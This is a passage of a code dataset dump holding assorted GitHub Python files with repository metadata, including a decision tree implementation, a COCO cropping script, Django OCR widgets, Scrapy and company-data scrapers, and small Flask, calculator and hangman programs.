pedsToHashes.items() if not checkValidHex(v)}\n\n# spawnablePeds_ls = [n for n, h in pedsToHashes.items() if n[-2:] != \"_p\" and not \"*\" in h]\nspawnablePeds_ls = [k for k in pedsToHashes.keys()]\n\ndef convertHashToModelName(hash):\n if isinstance(hash, str):\n if hash[:2] != \"0x\":\n hash = \"0x\" + hash\n hash = hash.lower()\n elif isinstance(hash, int):\n hash = \"{0:#0{1}x}\".format(hash,10)\n else:\n raise ValueError(\"hash has to be given in type str or int\")\n \n try:\n modelName = hashesToPeds[hash]\n except KeyError:\n modelName = \"UNKNOWN\"\n return modelName\n\ndef convertModelNameToHash(modelName):\n return
pedsToHashes[modelName][2:]\n\ndef getRandomPed():\n return random.sample(spawnablePeds_ls, 1)[0]\n\n\n\n","repo_name":"David0tt/DeepGTAV","sub_path":"VPilot/utils/PedNamesAndHashes.py","file_name":"PedNamesAndHashes.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"32"} +{"seq_id":"8546786957","text":"import pandas\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import model_selection\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n#Tree Node\r\nclass Node:\r\n def __init__(self, predicted_class):\r\n self.predicted_class = predicted_class\r\n self.feature_index = 0\r\n self.threshold = 0\r\n self.left = None\r\n self.right = None\r\n\r\n#Model\r\nclass DecisionTree:\r\n def __init__(self, max_depth=10):\r\n self.max_depth = max_depth\r\n \r\n #Fit method makes the tree\r\n def fit(self, X, y):\r\n self.n_classes_ = len(set(y))\r\n self.n_features_ = X.shape[1]\r\n self.tree_ = self._grow_tree(X, y)\r\n \r\n #Called by the fit method, recursive function\r\n def _grow_tree(self, X, y, depth=0):\r\n num_samples_per_class = [np.sum(y == i) for i in range(self.n_classes_)]\r\n predicted_class = np.argmax(num_samples_per_class)\r\n node = Node(predicted_class=predicted_class)\r\n if depth < self.max_depth:\r\n idx, thr = self._best_split(X, y)\r\n if idx is not None:\r\n indices_left = X[:, idx] < thr\r\n X_left, y_left = X[indices_left], y[indices_left]\r\n X_right, y_right = X[~indices_left], y[~indices_left]\r\n node.feature_index = idx\r\n node.threshold = thr\r\n node.left = self._grow_tree(X_left, y_left, depth + 1)\r\n node.right = self._grow_tree(X_right, y_right, depth + 1)\r\n return node\r\n \r\n #Called by the grow tree, finds best split feature and threshold\r\n def _best_split(self, X, y):\r\n m = y.size\r\n if m <= 1:\r\n return None, None\r\n num_parent = [np.sum(y == c) for c in range(self.n_classes_)]\r\n best_gini = 1.0 - sum((n / m) ** 2 for n in num_parent)\r\n best_idx, best_thr = None, None\r\n for idx in range(self.n_features_):\r\n thresholds, classes = zip(*sorted(zip(X[:, idx], y)))\r\n num_left = [0] * self.n_classes_\r\n num_right = num_parent.copy()\r\n for i in range(1, m):\r\n c = classes[i - 1]\r\n num_left[c] += 1\r\n num_right[c] -= 1\r\n gini_left = 1.0 - sum(\r\n (num_left[x] / i) ** 2 for x in range(self.n_classes_)\r\n )\r\n gini_right = 1.0 - sum(\r\n (num_right[x] / (m - i)) ** 2 for x in range(self.n_classes_)\r\n )\r\n gini = (i * gini_left + (m - i) * gini_right) / m\r\n if thresholds[i] == thresholds[i - 1]:\r\n continue\r\n if gini < best_gini:\r\n best_gini = gini\r\n best_idx = idx\r\n best_thr = (thresholds[i] + thresholds[i - 1]) / 2\r\n return best_idx, best_thr\r\n\r\n #Predict\r\n def predict(self, X):\r\n return [self._predict(inputs) for inputs in X]\r\n \r\n #Helper for predict\r\n def _predict(self, inputs):\r\n node = self.tree_\r\n while node.left:\r\n if inputs[node.feature_index] < node.threshold:\r\n node = node.left\r\n else:\r\n node = node.right\r\n return node.predicted_class\r\n\r\nif __name__==\"__main__\":\r\n #Load iris data and split\r\n iris = pandas.read_csv(\"Data/iris.csv\") \r\n iris=iris.drop(\"species\", axis=1).to_numpy()\r\n iris_L = [0]*50+[1]*50+[2]*50\r\n X_train,X_test,y_train,y_test=model_selection.train_test_split(iris,iris_L,test_size=0.1)\r\n\r\n #Test classification model and compare it with sklearn's model\r\n d_values = 
list(range(1,10))\r\n accModel1= []\r\n accModel2= []\r\n\r\n for d in d_values:\r\n model1 = DecisionTree(d)\r\n model1.fit(X_train, np.array(y_train))\r\n y_pred = model1.predict(X_test)\r\n accModel1.append(round(accuracy_score(y_test,y_pred)*100,2))\r\n\r\n for d in d_values:\r\n model2 = DecisionTreeClassifier(max_depth=d, criterion=\"gini\")\r\n model2.fit(X_train, y_train)\r\n y_pred = model2.predict(X_test)\r\n accModel2.append(round(accuracy_score(y_test,y_pred)*100,2))\r\n\r\n print(\"Our Accuracies: \", accModel1)\r\n print(\"Sklearn's Accuracies: \", accModel2)\r\n plt.scatter(accModel1, accModel2)\r\n plt.title(\"Decision Tree Accuracy comparison\")\r\n plt.xlabel(\"Accuracy of our DT\")\r\n plt.ylabel(\"Accuracy of sklearn's DT\")\r\n plt.show()\r\n","repo_name":"abhibhargav29/MLearns","sub_path":"5)DecisionTree.py","file_name":"5)DecisionTree.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"84141284","text":"import numpy as np\nimport json\nfrom PIL import Image\nfrom pathlib import Path\nimport argparse\nimport os\n\ndef crop_images_bbox(input_dir,output_dir,anno_path, double_path = False):\n with open(anno_path) as f:\n anno = json.load(f)\n\n imageid2filename = {}\n for item in anno['images']:\n imageid2filename[item['id']] = item['file_name']\n\n label2conceptname = {}\n for item in anno['categories']:\n name = item['name'].replace(' ','_')\n label2conceptname[item['id']] = name\n if double_path == True:\n (output_dir/name/name).mkdir(parents=True, exist_ok = True)\n else:\n (output_dir/name).mkdir(parents=True, exist_ok = True)\n\n for item in anno['annotations']:\n bbox = item['bbox']\n if bbox[2] < 30 or bbox[3] < 30:\n continue\n bbox[2] += bbox[0]\n bbox[3] += bbox[1]\n img = Image.open(input_dir / imageid2filename[item['image_id']])\n img_cropped = img.crop(bbox)\n concept_name = label2conceptname[item['category_id']]\n if double_path == True:\n img_cropped.save(output_dir / f\"{concept_name}/{concept_name}/{item['id']}.jpg\")\n else:\n img_cropped.save(output_dir / f\"{concept_name}/{item['id']}.jpg\")\n \n return\n\nparser = argparse.ArgumentParser('Cropping COCO images with bounding boxs')\nparser.add_argument('-coco-path', type=str, default = 'data/coco')\nparser.add_argument('-concept-path', type=str, default = 'data_256')\nargs = parser.parse_args()\nprint(args)\n\ncoco_path = Path(args.coco_path)\ntrain_dir = coco_path / 'train2017'\nval_dir = coco_path / 'val2017'\ntrain_anno_path = coco_path / 'annotations/instances_train2017.json'\nval_anno_path = coco_path / 'annotations/instances_val2017.json'\n\nconcept_path = Path(args.concept_path)\nconcept_path.mkdir(parents=True, exist_ok = True)\nconcept_train_dir = concept_path / 'concept_train'\nconcept_train_dir.mkdir(parents=True, exist_ok = True)\nconcept_val_dir = concept_path / 'concept_test'\nconcept_val_dir.mkdir(parents=True, exist_ok = True)\n\ncrop_images_bbox(val_dir, concept_val_dir, val_anno_path)\ncrop_images_bbox(train_dir, concept_train_dir, train_anno_path, double_path=True)\n\n","repo_name":"zhiCHEN96/ConceptWhitening","sub_path":"cropping_images_COCO.py","file_name":"cropping_images_COCO.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"32"} +{"seq_id":"1812097668","text":"from django.forms.widgets import Widget\nfrom django.template import loader\nfrom django.utils.safestring import mark_safe\nfrom 
django.urls import reverse\nimport os\nfrom django.conf import settings\nfrom ocr import settings as ocr_default_settings\n\n\nclass LinkWidget(Widget):\n \"\"\"\n Base class for FileLink and PdfLink 2019-04-12\n \"\"\"\n template_name = None\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n LinkWidget constructor, 2019-04-12\n :param args:\n :param kwargs:\n \"\"\"\n super(LinkWidget, self).__init__(*args, **kwargs)\n\n\nclass FileLink(LinkWidget):\n \"\"\"\n Widget of OCRedFile.file for using in admin 2019-04-12\n \"\"\"\n template_name = 'ocr/forms/widgets/file_link.html'\n file_type = None\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n FileLink widget constructor, initializes self.file_type, 2019-04-12\n :param args:\n :param kwargs:\n \"\"\"\n if 'file_type' in kwargs:\n self.file_type = kwargs['file_type']\n kwargs.pop('file_type')\n super(FileLink, self).__init__(*args, **kwargs)\n\n def get_context(self, name, value, attrs):\n context = super(FileLink, self).get_context(name, value, attrs)\n if getattr(settings, 'OCR_FILE_PREVIEW', ocr_default_settings.FILE_PREVIEW) and 'image' in self.file_type:\n context['widget']['file_preview'] = True\n if not getattr(settings, 'OCR_STORE_FILES', ocr_default_settings.STORE_FILES):\n context['widget']['store_files_disabled'] = True\n if 'store_files_disabled' in context['widget']['value']:\n context['widget']['file_missing'] = True\n elif 'file_removed' in context['widget']['value']:\n context['widget']['file_removed'] = True\n else:\n context['widget']['filename'] = os.path.basename(str(value))\n context['widget']['url'] = reverse(__package__ + ':download',\n kwargs={'download_target': 'file', 'filename': context['widget']['filename']})\n return context\n\n\nclass PdfLink(LinkWidget):\n \"\"\"\n Widget that shows a link to pdf file on the update model admin page.\n If pdf file exists the 'Remove PDF' button shows.\n If pdf file does not exists and it is possible to create it the 'Create PDF' button will shows\n \"\"\"\n template_name = 'ocr/forms/widgets/pdf_link.html'\n can_create_pdf = None\n # no_source_file = False\n # ocred = False\n\n def __init__(self, *args, **kwargs):\n if 'can_create_pdf' in kwargs:\n self.can_create_pdf = kwargs['can_create_pdf']\n kwargs.pop('can_create_pdf')\n super(PdfLink, self).__init__(*args, **kwargs)\n\n def get_context(self, name, value, attrs):\n \"\"\"\n This function creates context for rendering widget template.\n If pdf file exists the context['pdf_exists'] will be True\n If pdf file does not exist and it is possible to create it context['create_pdf_button'] will be True\n :param name:\n :param value:\n :param attrs:\n :return:\n \"\"\"\n context = super(PdfLink, self).get_context(name, value, attrs)\n\n if not getattr(settings, 'OCR_STORE_PDF', ocr_default_settings.STORE_PDF):\n context['widget']['store_pdf_disabled'] = True\n if not context['widget']['value']:\n # value is empty, this means that OCRedFile.file is PDF and it has text,\n # or OCRedFile.file was ocred but OCRedFile.text is empty\n # In this case no need to show Remove button, and no need to show Create button\n return context\n if self.can_create_pdf:\n context['widget']['create_pdf_button'] = True\n if 'store_pdf_disabled' in context['widget']['value']:\n context['widget']['pdf_missing'] = True\n elif 'pdf_removed' in context['widget']['value']:\n context['widget']['pdf_removed'] = True\n else:\n context['widget']['filename'] = os.path.basename(str(value))\n context['widget']['url'] = reverse(__package__ + ':download',\n 
kwargs={'download_target': 'pdf', 'filename': context['widget']['filename']})\n context['widget']['pdf_exists'] = True\n return context\n\n\nclass PdfInfo(Widget):\n template_name = 'ocr/forms/widgets/pdf_info.html'\n pdf_info = None\n\n def __init__(self, *args, **kwargs):\n if 'pdf_info' in kwargs:\n self.pdf_info = kwargs['pdf_info']\n kwargs.pop('pdf_info')\n super(PdfInfo, self).__init__(*args, **kwargs)\n\n def get_context(self, name, value, attrs):\n context = super(PdfInfo, self).get_context(name, value, attrs)\n context['pdf_info'] = self.pdf_info\n return context\n","repo_name":"shmakovpn/ocr_server","sub_path":"ocr/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20535051897","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport os\nfrom urllib import quote\nfrom scrapy.spider import BaseSpider\ntry:\n from scrapy.selector import Selector\nexcept ImportError:\n from scrapy.selector import HtmlXPathSelector as Selector\n\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.utils.url import urljoin_rfc\n\nfrom scrapy.item import Item, Field\nfrom product_spiders.utils import extract_price\nfrom product_spiders.items import (\n Product,\n ProductLoaderWithNameStrip as ProductLoader\n)\n\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\nclass MetaData(Item):\n Promotions = Field()\n corner_promotion = Field()\n\n\nclass BathEmpireSpider(BaseSpider):\n name = \"bathempire-bathempire.com\"\n allowed_domains = [\"soak.com\", \"fsm.attraqt.com\"]\n start_urls = ['http://www.soak.com/']\n\n def parse(self, response):\n categories = response.xpath('//div[@id=\"header\"]//a/@href').extract()\n categories += response.xpath('//div[@class=\"categorypage\"]//div/a/@href').extract()\n for url in categories:\n yield Request(response.urljoin(url))\n\n category_tree = re.findall(\"'categorytree', '(.*)'\\);\", response.body)\n category_conf = re.findall(\"'category', '(.*)'\\);\", response.body)\n\n if category_conf and category_tree:\n category_tree = category_tree[0]\n category_conf = category_conf[0]\n \n products_page = ('http://fsm.attraqt.com/zones-js.aspx?version=2.23.2&'\n 'siteId=4170eb3b-f55c-40d3-aaeb-8cb777e96a28&referrer=&'\n 'sitereferrer=&pageurl='+quote(response.url)+'&esp_pg=1&zone0=category_recs1&'\n 'zone1=category&zone2=banner_advert&zone3=category_recs2&'\n 'zone4=category_recs3&facetmode=data&mergehash=true&'\n 'config_categorytree='+category_tree+'&config_category='+category_conf)\n meta={'category_tree': category_tree, \n 'category_conf': category_conf,\n 'url': response.url}\n yield Request(products_page, callback=self.parse_products, meta=meta)\n\n def parse_products(self, response):\n base_url = 'http://soak.com'\n\n hxs = Selector(text=response.body.replace('\\\\\"', '\"'))\n \n products = hxs.select('//div[contains(@class, \"product\")]//a[div[@class=\"name\"]]/@href').extract()\n for product in products:\n yield Request(urljoin_rfc(base_url, product), callback=self.parse_product)\n\n pages = hxs.select('//a[contains(@class, \"pageNumber\")]/text()').extract()\n for page in pages:\n next_page = ('http://fsm.attraqt.com/zones-js.aspx?version=2.23.2&'\n 'siteId=4170eb3b-f55c-40d3-aaeb-8cb777e96a28&referrer=&'\n 'sitereferrer=&pageurl='+response.meta['url']+'%23esp_pg%3D'+page+'&zone0=category_recs1&'\n 'zone1=category&zone2=banner_advert&zone3=category_recs2&'\n 'zone4=category_recs3&facetmode=data&mergehash=true&'\n 
'config_categorytree='+response.meta['category_tree']+'&config_category='+response.meta['category_conf'])\n yield Request(next_page, callback=self.parse_products, meta=response.meta)\n\n def parse_product(self, response):\n products = response.xpath('//div[contains(@class, \"product\")]//a[div[@class=\"name\"]]/@href').extract()\n if products:\n for product in products:\n yield Request(response.urljoin(product), callback=self.parse_product)\n\n pages = response.xpath('//a[contains(@class, \"pageNumber\")]/text()').extract()\n for page in pages:\n page = response.urljoin(page)\n yield Request(page)\n\n return\n\n name = response.xpath('//div/h1/text()').extract()\n try:\n price = response.xpath('//div[@class=\"bigprice GBP\"]/@data-price').extract()[0]\n except IndexError:\n for p in self.parse(response):\n yield p\n return\n\n brand = ''\n categories = response.xpath('//ul[@class=\"breadcrumb\"]/li/a/text()').extract()[1:]\n\n l = ProductLoader(item=Product(), response=response)\n\n image_url = response.xpath('//div[@id=\"mainImage\"]/img/@src').extract()\n image_url = response.urljoin(image_url[0]) if image_url else ''\n l.add_value('image_url', image_url)\n l.add_value('url', response.url)\n l.add_value('name', name)\n l.add_value('price', extract_price(price))\n l.add_value('brand', brand)\n l.add_value('category', categories)\n sku = response.xpath('//p[@class=\"partcode\"]/text()').re('Quick Code: (.*)')\n sku = sku[0] if sku else ''\n l.add_value('sku', sku)\n l.add_xpath('identifier', '//input[@name=\"product_id\"]/@value')\n\n item = l.load_item()\n\n promotions = response.xpath('//div[contains(@class, \"price_box\")]//div[@class=\"GBP\"]/span[@class=\"desktop_rrp\" or @class=\"saving\"]/text()').extract()\n\n corner_promotion = response.xpath('//img[@class=\"cornerflash\"]/@src').re('Empire/(.*).png')\n corner_promotion = corner_promotion[0] if corner_promotion else ''\n\n corner_promotions = {'pricedrop': 'Price Drop',\n 'deal': 'Deal',\n 'freedel': 'Free Delivery',\n 'newarrival': 'New Arrival',\n 'sale': 'Sale',\n 'bestseller': 'Bestseller',\n 'wasteincluded': 'Waste Included',\n 'trayincluded': 'Tray Included',\n 'clearance': 'Clearance',\n 'pricedropred': 'Price Drop',\n 'asseenontv': 'As Seen On T.V'}\n\n metadata = MetaData()\n metadata['corner_promotion'] = corner_promotions.get(corner_promotion, '')\n metadata['Promotions'] = ' '.join(promotions) if promotions else ''\n item['metadata'] = metadata\n\n stock_url = \"http://soak.com/includes/ajax/in_stock.php\"\n part_code = response.xpath('//div[contains(@class, \"stock_report\")]/@data-partcode').extract()[0]\n manufacturers_id = response.xpath('//div[contains(@class, \"stock_report\")]/@data-manufacturers_id').extract()[0]\n formdata = {'action': 'in_stock',\n 'manufacturers_id': manufacturers_id,\n 'part_code': part_code}\n\n yield FormRequest(stock_url, formdata=formdata, callback=self.parse_stock, meta={'item': item})\n\n def parse_stock(self, response):\n item = response.meta['item']\n stock = response.xpath('//*[contains(text(), \"In stock\")]').extract()\n if not stock:\n item['stock'] = 0\n\n shipping_url = \"http://soak.com/product.php?action=ShippingQuote\"\n formdata = {'productID': item['identifier']}\n req = FormRequest(shipping_url, formdata=formdata, callback=self.parse_shipping_cost, meta={'item': item})\n yield req\n\n def parse_shipping_cost(self, response):\n item = response.meta['item']\n\n shipping_cost = response.xpath('//span[@class=\"GBP currency2\"]/text()').extract()\n if shipping_cost:\n 
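# the GBP xpath above may match nothing, so only call extract_price (imported from product_spiders.utils at the top of this spider) when a quote actually came back; the guard keeps shipping_cost[0] from raising an IndexError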
item['shipping_cost'] = extract_price(shipping_cost[0])\n\n yield item\n\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/bathempire/bathempire.py","file_name":"bathempire.py","file_ext":"py","file_size_in_byte":7410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25228262433","text":"import datetime\nimport logging\nimport random\nimport threading\nimport time\nimport traceback\nfrom multiprocessing import Process\nimport schedule\nfrom read_company_base import get_company_base_cert_readfile\nfrom spider.redis_company import company_four, company_four_over\nfrom spider.sikuyipingminspider import MinSpider, wirte_file\nfrom spider.sql import searchdb, serch_siku_id\n\n\ndef get_redis_company_id_base_cert():\n try:\n spider = MinSpider()\n spider.replace_ip()\n while True:\n times=str(datetime.date.today())\n fil=f'company_id{times}.txt'\n if spider.booltime(times): # if true, wait 1h\n print('waiting 1h......')\n wirte_file(fil,data=1)\n get_company_base_cert_readfile()\n companys = set()\n for n in range(10):\n cname=company_four()\n # psnum = searchdb(cname)\n # print(cname, psnum)\n # if not psnum:\n companys.add(cname)\n print(companys)\n # time.sleep(2222)\n threads_name_id = [] # iterate to fetch company name/id pairs\n for companyname in companys:\n print(companyname)\n threadid = threading.Thread(target=spider.get_company_id, args=(companyname, fil))\n threadid.start()\n threads_name_id.append(threadid)\n for thread in threads_name_id:\n thread.join()\n threads_base_cert = [] # iterate to fetch base cert data\n for base in spider.companyset:\n companybase=eval(base.replace('\\n', ''))\n print(companybase)\n cname = companybase[0]\n if not searchdb(cname):\n cid = companybase[1]\n scthread = threading.Thread(target=spider.run_search_base_cert, args=(cid, cname,times),)\n scthread.start()\n threads_base_cert.append(scthread)\n for thread in threads_base_cert:\n thread.join()\n for cname in companys:\n company_four_over(cname)\n spider.companyset.clear()\n spider.randomtime()\n except Exception as e:\n logging.error(f\"def get_redis_company_id_base_cert failed to fetch: {e}\\n{traceback.format_exc()}\")\n\ndef run2():\n process = []\n for a in range(10):\n p = Process(target=get_redis_company_id_base_cert)\n print(p.name)\n p.start()\n process.append(p)\n for pro in process:\n pro.join()\n print('collection finished')\n\n\nif __name__ == '__main__':\n\n # print('after waiting 1h ,start timer..... ')\n # schedule.every().day.at(\"01:19:00\").do(run2)\n while True:\n run2()\n # schedule.run_pending()\n # print('after waiting 1h ,start timer.....
')\n time.sleep(1000*random.random() * 500)\n","repo_name":"Uther-ivy/siku_spider","sub_path":"run_redis_siku_base.py","file_name":"run_redis_siku_base.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1400788684","text":"from flask import Flask, render_template,request\nimport mlab\nfrom bike import Bike\n\n\n\napp = Flask(__name__)\nmlab.connect()\n@app.route(\"/new_bike\", methods = [\"GET\", \"POST\"])\ndef new_bike():\n if request.method == \"GET\":\n return render_template (\"add_bike.html\")\n else:\n form = request.form \n m = form[\"Model\"]\n d = form[\"Dailyfee\"]\n i = form[\"Image\"]\n y = form[\"Year\"]\n n = Bike(Model = m, Dailyfee = d, Image = i, Year = y)\n n.save()\n print(n)\n return \"Ahihi DO ngoc\"\n\nif __name__ == \"__main__\": \n app.run(debug=True)\n\n","repo_name":"Ngocdungnb/ngocdung-web","sub_path":"web3/homework/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19047497859","text":"def add_category_weights(event, context):\n\n from google.cloud import storage\n from google.cloud import firestore\n from google.cloud import pubsub_v1\n\n\n def list_categories(bucket_name, source_blob_name):\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.get_blob(source_blob_name)\n categories = blob.download_as_string(client=None).decode('utf-8').split(',')\n\n return categories\n\n def create_weights(list_of_categories, collection):\n\n db = firestore.Client()\n emails_list = db.collection(u'{}'.format(collection)).get()\n \n print(list_of_categories)\n other_category = 'other'\n\n dict_of_weights = {}\n for category in list_of_categories:\n dict_of_weights[category] = 0\n print(dict_of_weights)\n \n for email in emails_list:\n categories = email.get(\"categories\")\n\n for category in categories:\n dict_of_weights[category] = dict_of_weights[category] + 1\n \n print(dict_of_weights)\n \n for category in list_of_categories:\n # Add a new document\n doc_ref = db.collection(u'category_weights').document(u'{}'.format(category))\n doc_ref.set({\n u'name': u'{}'.format(category),\n u'weight': dict_of_weights[category]\n })\n\n list_of_categories = list_categories('email_staging', 'list-of-categories.txt')\n create_weights(list_of_categories, 'emails')\n\n publisher = pubsub_v1.PublisherClient()\n topic_name = 'projects/{project_id}/topics/{topic}'.format(\n project_id='hack-hackasaumon',\n topic='sentiment-trigger', # Set this to something appropriate.\n )\n future = publisher.publish(topic_name, b'Done adding weights')\n future.result()\n return f'Weights added to Firestore!'\n","repo_name":"fleadsom/dbee","sub_path":"cloud_functions/add-weights/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37112585593","text":"# returns all the dicts in a list\r\ndef dicts_in_list(l: list):\r\n # empty list\r\n dicts = []\r\n # iterate over everything in the list\r\n for item in l:\r\n # if it is a dict, append it to the list\r\n if isinstance(item, dict):\r\n dicts.append(item)\r\n # if it is a list, recurse and join the result with the dict list\r\n elif isinstance(item, list):\r\n dicts = dicts + dicts_in_list(item)\r\n # return the list of dicts found inside the list\r\n return
dicts\r\n\r\n\r\n# depth of a dictionary\r\ndef dict_len(mydict, count=0):\r\n # list of branch depths\r\n branches = []\r\n # for each key in the dict\r\n for key in mydict:\r\n # if it is a dict\r\n if isinstance(mydict[key], dict):\r\n # add a branch with value 1\r\n branches.append(1)\r\n # recursion\r\n count = dict_len(mydict[key], count)\r\n # add the value to the list\r\n branches[-1] += count\r\n # if it is a list\r\n elif isinstance(mydict[key], list):\r\n # iterate over the dicts in the list\r\n for item in dicts_in_list(mydict[key]):\r\n # each one is a new branch\r\n branches.append(1)\r\n count = dict_len(item, count)\r\n branches[-1] += count\r\n # if there are no branches the depth is 0; the 1 was already added when the value was appended to the list\r\n if not branches:\r\n count = 0\r\n else:\r\n # if there are branches, take the deepest one\r\n count = max(branches)\r\n # return the deepest branch\r\n return count\r\n","repo_name":"FoRBeR/Dictionary-nesting-depth","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39476466228","text":"def soma():\n x = input('Enter the first number: ')\n y = input('Enter the second number: ')\n soma = int(x) + int(y)\n print(f'The sum {x} + {y} is {soma}')\n\ndef subtracao():\n x = input('Enter the first number: ')\n y = input('Enter the second number: ')\n subtracao = int(x) - int(y)\n print(f'The subtraction {x} - {y} is {subtracao}')\n\ndef multiplicacao():\n x = input('Enter the first number: ')\n y = input('Enter the second number: ')\n multiplicacao = float(x) * float(y)\n print(f'The multiplication {x} * {y} is {multiplicacao}')\n\ndef divisao():\n x = input('Enter the first number: ')\n y = input('Enter the second number: ')\n divisao = int(x)/int(y)\n print(f'The division {x} / {y} is {divisao}')\n\nescolha=1\n\nwhile escolha:\n print('0. Exit')\n print('1. Add')\n print('2. Subtract')\n print('3. Multiply')\n print('4.
Divide')\n\n escolha = int(input('Option: '))\n\n if(escolha==1):\n soma()\n if(escolha==2):\n subtracao()\n if(escolha==3):\n multiplicacao()\n if(escolha==4):\n divisao()","repo_name":"Danielhlw/Estudos-Python","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41230058488","text":"import os\r\nimport time\r\n\r\n\r\n\r\nwhile 1>0:\r\n tentatives = 0\r\n dico_mot = []\r\n # ask for the word to guess, then lowercase it.\r\n solution = input(\"Enter the word that will be used to play hangman: \")\r\n solution_minuscule= x=solution.lower()\r\n os.system(\"cls\")\r\n time.sleep(0.5)\r\n dico_fautes = [\"\\n \\n \\n \\n \\n \\n \\n _|_\",\"\\n  | \\n |\\n | \\n |\\n |\\n _|_ \",\" ________ \\n  | \\n |\\n | \\n |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | \\n |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | /\\ \\n |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | /|\\ \\n | |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | /|\\ \\n | |\\n | / \\ \\n _|_ You Lost\"]\r\n tiret_bas = []\r\n \r\n # check that the characters are all in the accepted list.\r\n # then print one underscore for each of the\r\n # letters in the word.\r\n \r\n for i in range(len(solution_minuscule)):\r\n dico_mot.append(solution_minuscule[i])\r\n tiret_bas.append(\"_\")\r\n nb_caractere = len(solution)\r\n nb_lettre = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\"ç\",\"é\",\"è\",\"â\",\"ä\",\"ù\"]\r\n \r\n if dico_mot[i] not in nb_lettre:\r\n print(\"There is an error in the word you entered (letters only, please!)\")\r\n solution = input('Enter the word to guess: ')\r\n \r\n print(\"The word to guess is: \"+ len(solution_minuscule)*\"_ \")\r\n \r\n time.sleep(0.25)\r\n \r\n # the player starts guessing; we tell them whether they are right or wrong\r\n # and how many attempts they have left\r\n\r\n while tentatives < 7 and \"_\" in tiret_bas :\r\n proposition = input(\"Suggest a letter: \")\r\n lettres_trouvees = \"\"\r\n \r\n if proposition in solution and len(proposition) == 1:\r\n lettres_trouvees = lettres_trouvees + proposition\r\n print(\"Good letter!\")\r\n \r\n for i in range(len(solution_minuscule)):\r\n l=[i for i in range(len(solution_minuscule)) if solution_minuscule[i]== proposition]\r\n \r\n for i in range(len(l)):\r\n tiret_bas[l[i]] = proposition\r\n print(\" \".join(tiret_bas))\r\n \r\n else:\r\n print(\"Missed, you have \", 7 - tentatives, \" attempts left\")\r\n print(dico_fautes[tentatives])\r\n tentatives = tentatives + 1\r\n print(\" _ _ __ _ _ _ _ __ __ _ \\n( \\/ ) \\/ )( \\ / )( ( | ( \\ \\n ) ( O ) \\/ ( \\ /\\ /)(/ / \\n(__/ \\__/\\____/ (_/\\_|__)_)__) \\n \") \r\n cond_recommencer = input(\"do you want to play again?
o/n \")\r\n \r\n # quit only when the player answers \"n\"; any other answer starts a new round\r\n if cond_recommencer == \"n\":\r\n break\r\n \r\n else:\r\n os.system(\"cls\")\r\nprint(\"Goodbye.\")","repo_name":"thomas-corteval/pendu-nsi","sub_path":"jeu_du_pendu.py","file_name":"jeu_du_pendu.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6929610161","text":"# serializers.py\nfrom rest_framework import serializers\n\nfrom .models import Employee\nfrom .models import Department\n\nclass EmployeeSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Employee\n\t\tfields = (\n\t\t\t'id', \n\t\t\t'first_name', \n\t\t\t'last_name',\n\t\t\t'position',\n\t\t\t'salary',\n\t\t\t'age',\n\t\t\t'department_id',\n\t\t)\n\nclass DepartmentCreateSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Department\n\t\tfields = (\n\t\t\t'id', \n\t\t\t'department_name',\n\t\t\t'chief',\n\t\t)\n\nclass DepartmentListSerializer(serializers.ModelSerializer):\n\tdepartment_id = serializers.IntegerField()\n\t# department_name = serializers.CharField(source='department_id.department_name', default=None)\n\temployee_count = serializers.IntegerField()\n\tsalary_sum = serializers.DecimalField(10,2)\n\tclass Meta:\n\t\tmodel = Employee\n\t\tfields = (\n\t\t\t'department_id', \n\t\t\t'employee_count', \n\t\t\t'salary_sum', \n\t\t\t# 